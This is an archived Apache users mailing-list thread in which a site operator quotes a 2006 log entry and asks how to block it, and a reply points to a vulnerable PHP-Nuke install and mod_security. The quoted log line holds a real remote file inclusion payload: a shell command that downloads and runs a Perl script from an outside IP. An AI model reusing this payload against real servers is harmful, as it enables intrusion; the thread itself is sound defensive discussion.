Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On 8/7/06, david <dvelayos@xxxxxxxxx> wrote:
Hello!

Recently, i've founded some entries on my apache webserver log like this:

[IP] - - [05/Aug/2006:02:17:47 +0200] "GET
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a
cmd.txt file from other site.

are there any way to detect this urls to stop this configuring apache?

If this is actually working on your server, you need to immediately
get rid of the application that is allowing it (php-nuke it seems),
since it has a major security flaw.

In general, mod_security can be used to block suspicious URLs.  But it
is not a substitute for making sure you only use secure web
applications.

Joshua.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx



[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux